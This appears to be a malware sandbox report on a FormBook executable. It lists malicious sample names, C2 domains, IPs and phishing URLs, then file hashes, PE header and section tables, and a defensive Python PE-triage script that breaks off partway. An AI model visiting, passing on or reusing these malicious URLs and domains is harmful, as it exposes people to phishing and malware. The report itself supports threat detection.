18.183.3.45 | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | www.cannulafactory.top/l90v/
18.183.3.45 | RCZ-PI-4057.exe | malicious | FormBook | www.cannulafactory.top/l90v/
18.183.3.45 | APS-0240226.exe | malicious | FormBook | www.cannulafactory.top/l90v/
18.183.3.45 | Prośba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | www.cannulafactory.top/y82c/
194.233.65.154 | quotation.exe | malicious | DarkTortilla, FormBook | www.weep.site/s05y/?lz=gDGbNZhd39jJRtKZsSz2sE2ibzdbN3TQtRc66BLH0/M6yu03EwHRmA2X+hqgqZY0iQlGVL/r5voLrOg76rHLRWH5eVpWuwJaYbwgWM3iOeHIoJ4t/7eG5v8=&pbM=rVxTT
194.233.65.154 | Shipping document_pdf.exe | malicious | FormBook | www.weep.site/yigx/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.anaidittrich.com | RFQ STR-160-01.exe | malicious | FormBook | 162.55.254.209
www.anaidittrich.com | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | 162.55.254.209
www.ayypromo.shop | RFQ STR-160-01.exe | malicious | FormBook | 176.57.64.102
www.ayypromo.shop | 報價請求 - 樣本目錄.vbs | malicious | FormBook, GuLoader | 176.57.64.102
www.ayypromo.shop | 031215-Revised-01.exe | malicious | FormBook | 176.57.64.102
www.ayypromo.shop | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | 176.57.64.102
www.ayypromo.shop | Prośba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | 176.57.64.102
www.ayypromo.shop | TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | malicious | FormBook | 176.57.64.102
www.jaxo.xyz | RFQ STR-160-01.exe | malicious | FormBook | 66.29.149.180
www.jaxo.xyz | 031215-Revised-01.exe | malicious | FormBook | 66.29.149.180
www.jaxo.xyz | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | 66.29.149.180
www.jaxo.xyz | RCZ-PI-4057.exe | malicious | FormBook | 66.29.149.180
www.jaxo.xyz | APS-0240226.exe | malicious | FormBook | 66.29.149.180
www.cannulafactory.top | RFQ STR-160-01.exe | malicious | FormBook | 18.183.3.45
www.cannulafactory.top | 報價請求 - 樣本目錄.vbs | malicious | FormBook, GuLoader | 18.183.3.45
www.cannulafactory.top | 031215-Revised-01.exe | malicious | FormBook | 18.183.3.45
www.cannulafactory.top | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | 18.183.3.45
www.cannulafactory.top | RCZ-PI-4057.exe | malicious | FormBook | 18.183.3.45
www.cannulafactory.top | APS-0240226.exe | malicious | FormBook | 18.183.3.45
www.cannulafactory.top | Prośba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | 18.183.3.45
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DIGITALOCEAN-ASNUS | dll.ps1 | malicious | Unknown | 207.154.255.134
DIGITALOCEAN-ASNUS | salak.ps1 | malicious | Unknown | 207.154.255.134
DIGITALOCEAN-ASNUS | zero(1).ps1 | malicious | Unknown | 207.154.255.134
DIGITALOCEAN-ASNUS | BTC.exe | malicious | AsyncRAT, Rezlt, StormKitty, VenomRAT, Vermin Keylogger, WorldWind Stealer, XWorm | 165.227.91.90
DIGITALOCEAN-ASNUS | djvu452.exe | malicious | Neconyd | 64.225.91.73
DIGITALOCEAN-ASNUS | https://digital-mashreq-online-marouanetax95783928.codeanyapp.com/spaceship/spoofi/Issued/cf464/ | malicious | Unknown | 198.199.109.95
DIGITALOCEAN-ASNUS | https://dkb-de-startseite-girokonto-factor.codeanyapp.com/Online/ | malicious | Unknown | 198.199.109.95
DIGITALOCEAN-ASNUS | SecuriteInfo.com.ELF.Mirai-ARL.6285.13699.elf | malicious | Mirai | 134.209.74.81
DIGITALOCEAN-ASNUS | ListenNowMsgs000037Secs_wav229.html | malicious | HTMLPhisher | 157.230.6.220
DIGITALOCEAN-ASNUS | Új fertőző betegség.cmd.exe | malicious | Lokibot | 104.248.205.66
ACPCA | Rockwool group_SKM_C590368369060_417161.pdf.pdf | malicious | HTMLPhisher | 162.0.217.108
ACPCA | PO#86637.exe | malicious | FormBook | 162.0.213.94
ACPCA | https://sweet-solomon.67-23-166-125.plesk.page/dave_jackson_tremblay/fouleebel--_--legardaise/victorien--_--.andre/tonysandrine.--_--henedieu/david.hernandez--_--aristizabal | malicious | Unknown | 162.55.246.61
ACPCA | RFQ STR-160-01.exe | malicious | FormBook | 162.55.254.209
ACPCA | firmware.arm-linux-gnueabihf.elf | malicious | Unknown | 162.48.22.207
ACPCA | PI 30_08_2024.exe | malicious | FormBook | 162.0.213.94
ACPCA | estado de cuenta adjunto.exe | malicious | FormBook | 162.0.213.72
ACPCA | Izvod racuna u prilogu.exe | malicious | DBatLoader, FormBook | 162.0.213.72
ACPCA | https://bio.to/vCOt6d | malicious | HTMLPhisher | 162.0.217.108
ACPCA | z1209627360293827.exe | malicious | DBatLoader, FormBook | 162.0.213.72
TELINEABA | RFQ STR-160-01.exe | malicious | FormBook | 176.57.64.102
TELINEABA | 報價請求 - 樣本目錄.vbs | malicious | FormBook, GuLoader | 176.57.64.102
TELINEABA | 031215-Revised-01.exe | malicious | FormBook | 176.57.64.102
TELINEABA | Copy of 01. Bill of Material - 705.exe | malicious | FormBook | 176.57.64.102
TELINEABA | Prośba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | 176.57.64.102
TELINEABA | TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | malicious | FormBook | 176.57.64.102
TELINEABA | sKQrQ9KjPJ.elf | malicious | Mirai | 88.214.61.219
TELINEABA | KE4cyjDEDO.elf | malicious | Mirai | 88.214.61.224
TELINEABA | http://91.223.169.83 | malicious | Unknown | 91.223.169.83
TELINEABA | 2hUhvRdIqt.elf | malicious | Mirai | 88.214.61.255
AMAZON-02US | REQST_PRC 410240665_2024.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | https://www.xcdsystem.com/cim/login.cfm?uuid=D1398507-DD24-5B76-51D78949B77AF96B&reviewid=374028&token=F6DCF9AE-F711-66A6-554296B16287F51C | malicious | Unknown | 13.224.189.35
AMAZON-02US | https://demo.testfire.net/login.jsp | malicious | Unknown | 76.223.61.160
AMAZON-02US | 154.213.187.80-arm-2024-08-30T23_29_44.elf | malicious | Mirai | 18.228.247.251
AMAZON-02US | 154.213.187.80-x86-2024-09-01T00_09_56.elf | malicious | Mirai | 54.238.198.235
AMAZON-02US | 95.214.27.183-x86-2024-09-02T08_52_28.elf | malicious | Unknown | 35.164.55.18
AMAZON-02US | iFGUaclVXq.exe | malicious | CobaltStrike, Metasploit | 52.216.146.86
AMAZON-02US | 154.213.187.80-mips-2024-08-30T23_29_44.elf | malicious | Mirai | 18.250.251.53
AMAZON-02US | PO_987654345678.exe | malicious | FormBook | 13.248.169.48
AMAZON-02US | https://travefy.com/f/6ws9rqrq4lmqra2uwxzy6aezsp4xkxar2apshpykuftzrrwdwjsujpvewgjnqxkagajsxvdptxmqhrazxxjrapumsdyzhnespwtsgsvcsqaqkdqq | malicious | Unknown | 34.250.67.152
No context
Process: C:\Windows\SysWOW64\rasdial.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe
File Type: data
Category: dropped
Size (bytes): 286208
Entropy (8bit): 7.990519326668667
Encrypted: true
SSDEEP: 6144:tle2dJcYKOhiSvaQ8U6NKvNa4A3+v1N0P1wRm:tle2dJc3uv76MQjUQ28
MD5: CA682B212E6AA6A0CE4037D2050704C7
SHA1: DE68A7B5941FF1EDA148301FCEF9AED2124B3C39
SHA-256: A4C715DEEEC61D98A6588C18A65818622385454DFCBA470E8CCAE1E8B8116263
SHA-512: 87AF907F493DEAC90329B9C8173C7618319594B720B1950383B0CEB29E5CDC430DE9B6B215D7E45A3F87916B5D09AB7640F9B31940E81AB61F798E84237D1694
Malicious: false
Reputation: low
                                        Preview:.n...TMSL...G..o.NV..dWE...U4NPLTMSLNU4NPLTMSLNU4NPLTMSLN.4NPBK.]L.\.o.M..r.&<Gn >;*!-#uW/>";9s.+uF;>l=#s....#?(1c^ADq4NPLTMS5O\.s0+.p3+.hT).V..v.2.T..q3+.O..p4*..'6\s0+.MSLNU4NP..MS.OT4....MSLNU4NP.TORGO^4N.HTMSLNU4NP|AMSL^U4N0HTMS.NU$NPLVMSJNU4NPLTKSLNU4NPL4ISLLU4NPLTOS..U4^PLDMSLNE4N@LTMSLNE4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4`$),9SLNA.JPLDMSL.Q4N@LTMSLNU4NPLTMSlNUTNPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLN
Process: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe
File Type: data
Category: dropped
Size (bytes): 15294
Entropy (8bit): 7.6134770553139415
Encrypted: false
SSDEEP: 384:gxFBExUlp6MbAC5Qf6U2A+/VVAyrdQyDhBghkWUPf:g9ExgDPQYEjUn
MD5: 3876D12E3AC8A865DEB658F4844ED2ED
SHA1: 3D2C37236671F9721576205382AE49C3ED4FD0D5
SHA-256: 4B2483BD78769514F8D7477CB16CDB3CE379392E0A5B0AFE9BE9072C9BCD5CEF
SHA-512: CCDC4E17B3629E17978E46BDF51E41D6C6CA93B78152BCAD8B5F586A91E63E7FC6CF4C324272DF02376C466308653029B4044B907F654F1842709EBF546E93F2
Malicious: false
Reputation: low
                                        Preview:EA06.....L.SI..l.............v0.|L.... .>&........ .|N...y..?.2.#.,@.....l.._.................7...,...........}. ...`.'.^.3P......q.M@+..0.?.a.....7...p|.*.............D..K.......0........|60-........ !_D....[|.`.......|.`.?.b......P...n.q....>....1...&........_...g.;.u..W....@N......8....l...&.......z.............6_p:7..d...,.._.%.......|.P...........0V..h.9..w}..O....B..`_.........l.$..$...T.&.(.=.......0..d......}...D..#....'...t.........b?k .G.Aa.....`1..=..#.C..c..1.....C.J......@1..(.#.!...............T}............l...z..P.'....~p.........8?Y.B..1...,@..8B..3.`...)...&....$}.4..(...c..../>..o......I|3`...p.y..E}.0.x%...Q.X@*?.I.f..e...f...........~.=_.....'...........O8...&@/_.8W......X.9.{(...b.j..@._.$..3.@...N..l..h.....|.._E........~..$.......puO.......~.Q;..........K....e.......p4.........60.........v.3q...[.....`.O.HJ+.....g z.p..m4....&@4.8.G...I...>?..ww..M...R..I..2..1.H..T>...G......(}.pF.`/..3..`@................b.F....~....jh........
Process: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 200718
Entropy (8bit): 3.0948663810883623
Encrypted: false
SSDEEP: 48:uAGV1NWQ4QBz9u17I+cA5GAkebA1DGAae85AKsGA5e4A+yGABefmAoNDl2nA4APi:c
MD5: 40FAA5495B7010ACDE5EBD2415AA20C8
SHA1: EECFFF42FEE9377540B0D718622E72EDC397549A
SHA-256: 66DEEA74665A2CBE7B77A0E688C70FCE85DD2AB05ABDA486859FCE31C0A72A4C
SHA-512: 5B88B3CB4FC009E0D0E0C8C1D05D67655B272BC8091E2AC08DB304B556E43FF8F8864E8710AD90D3442608273EE9D321A32D79F5D2908D7FEA70CBA7089F59AD
Malicious: false
                                        Preview:0324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481603248160324816032481
Process: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe
File Type: data
Category: dropped
Size (bytes): 286208
Entropy (8bit): 7.990519326668667
Encrypted: true
SSDEEP: 6144:tle2dJcYKOhiSvaQ8U6NKvNa4A3+v1N0P1wRm:tle2dJc3uv76MQjUQ28
MD5: CA682B212E6AA6A0CE4037D2050704C7
SHA1: DE68A7B5941FF1EDA148301FCEF9AED2124B3C39
SHA-256: A4C715DEEEC61D98A6588C18A65818622385454DFCBA470E8CCAE1E8B8116263
SHA-512: 87AF907F493DEAC90329B9C8173C7618319594B720B1950383B0CEB29E5CDC430DE9B6B215D7E45A3F87916B5D09AB7640F9B31940E81AB61F798E84237D1694
Malicious: false
                                        Preview:.n...TMSL...G..o.NV..dWE...U4NPLTMSLNU4NPLTMSLNU4NPLTMSLN.4NPBK.]L.\.o.M..r.&<Gn >;*!-#uW/>";9s.+uF;>l=#s....#?(1c^ADq4NPLTMS5O\.s0+.p3+.hT).V..v.2.T..q3+.O..p4*..'6\s0+.MSLNU4NP..MS.OT4....MSLNU4NP.TORGO^4N.HTMSLNU4NP|AMSL^U4N0HTMS.NU$NPLVMSJNU4NPLTKSLNU4NPL4ISLLU4NPLTOS..U4^PLDMSLNE4N@LTMSLNE4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4`$),9SLNA.JPLDMSL.Q4N@LTMSLNU4NPLTMSlNUTNPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLNU4NPLTMSLN
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.15682180612152
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:20-EM-00- PI-INQ-3001.exe
                                        File size:1'163'264 bytes
                                        MD5:f295444b03c418b35dcb676ed284e846
                                        SHA1:314ca3515894c3d36b10653a7bace039a6991f19
                                        SHA256:594db372022016f6e585ebdba18d74c642ce91613bdb2925d11b0e499c9d46d9
                                        SHA512:ce256901d2c79be4ffd96ff2f0ec2d8bb5f76db2a0baa489639aac5a2d5646d9bfbf3c542d6c2fcf0aa4b8a13d24ba46dc67340c2a124023bbd94cb532971e26
                                        SSDEEP:24576:xAHnh+eWsN3skA4RV1Hom2KXMmHaLPFU1Mz+WbXk5:Ih+ZkldoPK8YaLPan
                                        TLSH:5D35BD0273D2D036FFABA2739B6AB20256BC79254133852F13981DB9BD701B1237D663
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                        Icon Hash:4a786c6652ece047
                                        Entrypoint:0x42800a
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66D688AA [Tue Sep 3 03:55:22 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
Import Hash:afcdf79be1557326c854b6e20cb900a7
Note: the import table listed further down is the complete, unobfuscated import set of the AutoIt3 interpreter (WSOCK32, WINMM, MPR, WININET, IPHLPAPI, USERENV, plus BlockInput, mouse_event/keybd_event/SendInput, LogonUserW, CreateProcessAsUserW and the clipboard APIs). The "Binary is likely a compiled AutoIt script file" verdict and the capability signatures in the overview (block input, execute as a different user, clipboard access) are triggered by these interpreter imports; they describe what the runtime can do, not necessarily what the embedded script does.
Instruction (entrypoint preview, disassembly starting at 0x42800a)
                                        call 00007F317CE2B46Dh
                                        jmp 00007F317CE1E224h
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push edi
                                        push esi
                                        mov esi, dword ptr [esp+10h]
                                        mov ecx, dword ptr [esp+14h]
                                        mov edi, dword ptr [esp+0Ch]
                                        mov eax, ecx
                                        mov edx, ecx
                                        add eax, esi
                                        cmp edi, esi
                                        jbe 00007F317CE1E3AAh
                                        cmp edi, eax
                                        jc 00007F317CE1E70Eh
                                        bt dword ptr [004C41FCh], 01h
                                        jnc 00007F317CE1E3A9h
                                        rep movsb
                                        jmp 00007F317CE1E6BCh
                                        cmp ecx, 00000080h
                                        jc 00007F317CE1E574h
                                        mov eax, edi
                                        xor eax, esi
                                        test eax, 0000000Fh
                                        jne 00007F317CE1E3B0h
                                        bt dword ptr [004BF324h], 01h
                                        jc 00007F317CE1E880h
                                        bt dword ptr [004C41FCh], 00000000h
                                        jnc 00007F317CE1E54Dh
                                        test edi, 00000003h
                                        jne 00007F317CE1E55Eh
                                        test esi, 00000003h
                                        jne 00007F317CE1E53Dh
                                        bt edi, 02h
                                        jnc 00007F317CE1E3AFh
                                        mov eax, dword ptr [esi]
                                        sub ecx, 04h
                                        lea esi, dword ptr [esi+04h]
                                        mov dword ptr [edi], eax
                                        lea edi, dword ptr [edi+04h]
                                        bt edi, 03h
                                        jnc 00007F317CE1E3B3h
                                        movq xmm1, qword ptr [esi]
                                        sub ecx, 08h
                                        lea esi, dword ptr [esi+08h]
                                        movq qword ptr [edi], xmm1
                                        lea edi, dword ptr [edi+08h]
                                        test esi, 00000007h
                                        je 00007F317CE1E405h
                                        bt esi, 03h
                                        Programming Language:
                                        • [ASM] VS2013 build 21005
                                        • [ C ] VS2013 build 21005
                                        • [C++] VS2013 build 21005
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ASM] VS2013 UPD5 build 40629
                                        • [RES] VS2013 build 21005
                                        • [LNK] VS2013 UPD5 build 40629
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xbc0cc          0x17c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc8000          0x519d8       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x11a000         0x7134        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x92bc0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xa4b50          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8f000          0x884         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Note: the SECURITY directory is empty, which is what "Digitally signed: false" above reflects, and there is no TLS directory, so no TLS callback runs before the entry point (hence the empty "TLS Callbacks" field). The RESOURCE directory covers the whole .rsrc section (0xc8000, 0x519d8 bytes).
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0x8dfdd       0x8e000   310e36668512d53489c005622bb1b4a9  False     0.5735602580325704   data       6.675248351711057   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8f000          0x2fd8e       0x2fe00   748cf1ab2605ce1fd72d53d912abb68f  False     0.32828818537859006  data       5.763244005758284   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xbf000          0x8f74        0x5200    aae9601d920f07080bdfadf43dfeff12  False     0.1017530487804878   data       1.1963819235530628  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0xc8000          0x519d8       0x51a00   acc4df1cebc16ce062aabf871a5e3506  False     0.9650112461715161   data       7.961795671644971   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x11a000         0x7134        0x7200    f04128ad0f87f42830e4a6cdbc38c719  False     0.7617530153508771   data       6.783955557128661   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
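The checks an analyst runs over a header and section table like the one above (is the file signed, does it opt into NX, does the entry point land in an executable section, which sections sit near the 8 bits/byte ceiling) are mechanical enough to script. The Python below is an added example, not part of the Joe Sandbox report: a minimal PE32 header walker using only the standard library that recovers the timestamp, entry point, subsystem, DllCharacteristics and the SECURITY directory, computes per-section Shannon entropy, and applies those checks. The fixture PE it parses is constructed inline so the script runs offline; nothing in the fixture comes from the analysed sample except the timestamp value 0x66D688AA, reused so the decoded date can be compared with the "Time Stamp" field above. The 7.0 bits/byte threshold is an assumption, a conventional cut-off rather than a standard.

```python
"""Minimal PE32 header walker plus the triage checks used on a section table.

Added example, not part of the Joe Sandbox report. Standard library only; the
fixture PE is constructed here and is NOT the analysed sample (only the timestamp
value 0x66D688AA is reused so the decoded date matches the report's field).
"""
import math
import random
import struct
from collections import Counter
from datetime import datetime, timezone

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100
HIGH_ENTROPY = 7.0  # assumption: bits/byte above which content is usually compressed or encrypted


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the ceiling for uniformly random data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def build_sample_pe(sections, timestamp=0x66D688AA, signed=False) -> bytes:
    """Construct a minimal 32-bit PE (constructed fixture) from (name, characteristics, bytes) tuples."""
    file_align, sect_align, headers_size = 0x200, 0x1000, 0x400
    hdrs, raw, rva, ptr = b"", b"", sect_align, headers_size
    for name, chars, data in sections:
        raw_size = (len(data) + file_align - 1) // file_align * file_align
        hdrs += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                            len(data), rva, raw_size, ptr, 0, 0, 0, 0, chars)
        raw += data.ljust(raw_size, b"\0")
        rva += (len(data) + sect_align - 1) // sect_align * sect_align
        ptr += raw_size
    dirs = [(0, 0)] * 16
    blob = b""
    if signed:  # SECURITY entry holds a file offset, not an RVA; append a dummy 0x100-byte blob there
        dirs[4], blob = (ptr, 0x100), b"\0" * 0x100
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 12, 0, 0, 0, 0, 0x1000, 0x1000, 0x2000, 0x400000, sect_align, file_align,
                      5, 1, 5, 1, 5, 1, 0, rva, headers_size, 0,
                      2, 0x8040,  # GUI subsystem; DYNAMIC_BASE | TERMINAL_SERVER_AWARE, no NX_COMPAT (as in the report)
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, len(opt), 0x0122)
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\0")  # e_lfanew = 0x80
    return (dos + b"PE\0\0" + coff + opt + hdrs).ljust(headers_size, b"\0") + raw + blob


def parse_pe(image: bytes) -> dict:
    """Walk DOS -> NT -> optional header -> section table of a PE32 image."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", image, 0x3C)[0]
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    machine, nsect, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, pe + 4)
    opt = pe + 24
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled in this example")
    entry = struct.unpack_from("<I", image, opt + 16)[0]
    image_base = struct.unpack_from("<I", image, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", image, opt + 68)
    _, sec_size = struct.unpack_from("<II", image, opt + 96 + 4 * 8)  # data directory 4 = SECURITY
    sections = []
    for i in range(nsect):
        name, vsize, va, rsize, rptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", image, opt + opt_size + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_size": rsize, "characteristics": chars,
                         "entropy": round(shannon_entropy(image[rptr:rptr + rsize]), 3)})
    return {"machine": machine, "entrypoint": entry, "image_base": image_base, "subsystem": subsystem,
            "dll_characteristics": dll_chars, "signed": sec_size != 0, "sections": sections,
            "timestamp_utc": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")}


def triage(info: dict) -> list:
    """The static checks a reviewer applies to a header/section table."""
    findings = []
    if not info["signed"]:
        findings.append("no Authenticode signature (IMAGE_DIRECTORY_ENTRY_SECURITY empty)")
    if not info["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_NX_COMPAT:
        findings.append("NX_COMPAT not set in DllCharacteristics")
    ep = info["entrypoint"]
    ep_sec = next((s for s in info["sections"]
                   if s["va"] <= ep < s["va"] + max(s["vsize"], s["raw_size"])), None)
    if ep_sec is None or not ep_sec["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry point 0x{ep:x} is not inside an executable section")
    for s in info["sections"]:
        if s["entropy"] > HIGH_ENTROPY:
            findings.append(f"{s['name']}: entropy {s['entropy']:.2f} bits/byte, likely compressed or encrypted content")
    return findings


_rng = random.Random(20240903)
SAMPLE_SECTIONS = [  # constructed fixture: a repetitive "code" section and a random "resource" section
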